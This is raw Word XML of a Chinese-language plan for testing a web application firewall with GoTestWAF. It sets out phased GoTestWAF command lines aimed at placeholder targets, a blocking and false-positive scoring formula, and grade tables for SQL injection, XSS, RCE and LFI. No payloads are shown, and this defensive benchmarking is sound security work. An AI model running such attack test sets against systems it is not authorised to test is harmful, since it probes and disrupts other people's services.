    </w:p>
    <w:p w14:paraId="0F4FD0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└────────┬────────┘   - 分析安全差距</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CD53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         - 提出优化建议</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745797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▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A45E7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┌─────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FB4CB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第七阶段      │   验证改进</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C57755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复测验证      │   - 实施优化措施</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111190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└─────────────────┘   - 执行回归测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35296A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更新安全基线</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669A1656">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EFDC32C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20E1D6F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详细步骤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0594C3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D93A077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第一阶段：环境准备（预计 1 天）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5847EA75">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑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1797"/>
        <w:gridCol w:w="1616"/>
      </w:tblGrid>
      <w:tr w14:paraId="5999E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4CA55B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步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="4472C4"/>
          </w:tcPr>
          <w:p w14:paraId="6ED698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任务</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="4472C4"/>
          </w:tcPr>
          <w:p w14:paraId="7B93E3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输出</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5B7FE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0815CF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1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1356BF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部署测试靶场</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1FB4EB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靶场访问地址</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2D7A5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213BE8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1.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="227AE5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配置 WAF 保护</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="36F0AF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WAF 配置文档</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0A7E6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0A0575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1.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="72B28A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安装 GoTestWAF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3702689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工具运行环境</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="04665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7CF182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1.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="084066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验证网络连通性</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="5FBA29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连通性测试报告</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="759C9552">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F356BC2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07560354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第二阶段：WAF 识别（预计 0.5 天）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F505E3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="019CC2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自动识别 WAF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016424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\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EE1D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--url=https://target.example.com \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6738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--skipWAFIdentification=false \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B393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0FCC6CCB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E0DCB3D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41046BFA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第三阶段：基线测试（预计 1 天）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD1CC79">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46BC81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OWASP 标准测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F522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\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608043C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--url=https://target.example.com \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC0B1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--wafName="WAF产品名称" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5E90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--testSet=owasp \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D207EE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--reportFormat=html,pdf,docx \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4485BF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--reportName=phase3-owasp-baseline \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352FC9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6A839920">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="284E2A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API 安全测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FD8D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\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB534F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--url=https://api.example.com \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D67CD8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--testSet=owasp-api \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9F01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--openapiFile=./api-spec.yaml \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF73C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--reportName=phase3-api-baseline \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179240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66D99B3E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46A2B72F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="735CF3E7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第四阶段：进阶测试（预计 1 天）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C61579F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27F9AD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社区测试用例</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB03FC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\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF7DCE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--url=https://target.example.com \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABA39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--testCasesPath=testcases/community \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE5D3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--reportName=phase4-community \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EE1C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30AA5530">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60E086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自定义测试用例</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64845B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\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA719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--url=https://target.example.com \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABA0AB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--testCasesPath=testcases/custom \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30410C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--reportName=phase4-custom \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6718495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19A7F2C5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BB53F5D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FFF4C3C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第五阶段：误报测试（预计 0.5 天）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B4D8B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5070D1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真负例测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C5EBD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\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4354CD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--url=https://target.example.com \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6594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--testCasesPath=testcases/false-pos \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42084AF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--reportName=phase5-false-positive \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293690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21B483D5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77093817">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2215D5AF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第六阶段：结果分析（预计 1 天）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CD9865">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3582EDD3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汇总所有测试报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0471C7A0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统计拦截率、绕过率、误报率</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73274ED4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分析绕过的攻击类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35722907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评估安全风险等级</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70502842">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E45C33F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第七阶段：复测验证（预计 1 天）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C05A768">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CFACC52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根据分析结果优化 WAF 配置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05523D5F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针对绕过点添加规则</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BBA47C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执行回归测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C51E204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更新安全基线</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369A463F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B99E19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04992586">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33F08B5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五、评估标准</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D34563A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FC0BB0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评分体系</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C84EDF9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22A2814F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5.1.1 综合评分公式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE0F5FA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DDC92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综合评分 = (真正例拦截率 × 0.7) + (真负例通过率 × 0.3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C39ABA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D6969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真正例拦截率 = 已拦截请求数 / (已拦截 + 已绕过)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B257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真负例通过率 = 已通过请求数 / (已通过 + 已拦截)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47553C12">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="450B1EEE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04FA6E7D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5.1.2 等级划分</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02407F88">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑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"/>
        <w:gridCol w:w="982"/>
        <w:gridCol w:w="1016"/>
        <w:gridCol w:w="3726"/>
      </w:tblGrid>
      <w:tr w14:paraId="0099B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4E1C52A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分数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="4472C4"/>
          </w:tcPr>
          <w:p w14:paraId="3A00DE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等级</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="4472C4"/>
          </w:tcPr>
          <w:p w14:paraId="4AAE36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风险等级</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="4472C4"/>
          </w:tcPr>
          <w:p w14:paraId="5CDA1A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描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="53985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6E6824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≥90%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="352DDE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 优秀</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="71A054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低</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5A6D30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WAF 配置优秀，可有效防护各类攻击</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="06625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5F0B2C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75-89%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="758597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 良好</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="0A3ABD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中低</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="514BFED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WAF 配置良好，建议优化个别规则</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="74A97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4C4003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60-74%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="30057F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 中等</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3E81DA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</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="21AA4D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WAF 存在防护盲区，需要针对性调优</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7DA8D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4FA7B2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40-59%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="39E583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 及格</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="1876A0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中高</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="2F00E6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WAF 配置存在明显问题，需要重点优化</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0B7FF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3F0949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&lt;40%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4A84F1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 不及格</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3543A2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</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="03EFD6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WAF 几乎无防护能力，需要重新评估</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="44339645">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="090774E0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74ECDE1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分类评估标准</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391DC47B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="795D4E7E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5.2.1 攻击类型评估</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352A75CA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑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777"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="816"/>
      </w:tblGrid>
      <w:tr w14:paraId="233AA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5E6B97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攻击类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="4472C4"/>
          </w:tcPr>
          <w:p w14:paraId="7E4227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优秀</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="4472C4"/>
          </w:tcPr>
          <w:p w14:paraId="100128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良好</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="4472C4"/>
          </w:tcPr>
          <w:p w14:paraId="431536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中等</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="4472C4"/>
          </w:tcPr>
          <w:p w14:paraId="40F746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及格</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="4472C4"/>
          </w:tcPr>
          <w:p w14:paraId="0CB372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不及格</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="22E04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2ED991D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SQL 注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="64758B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≥95%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="06D326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≥85%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="10AD503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≥70%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2D0050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≥50%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3B8A7A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&lt;50%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4374D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36417D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XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="1E9E86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≥95%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="0B3596D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≥85%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="5F5C8D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≥70%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="433A21D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≥50%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="4EEA8A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&lt;50%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0F82E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4CC4AC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RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4F29DE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≥98%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="25D803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≥90%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="647E2C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≥80%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="08FD67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≥60%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7F2DED6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&lt;60%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1748E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245BF04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LFI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="1A9091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≥95%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
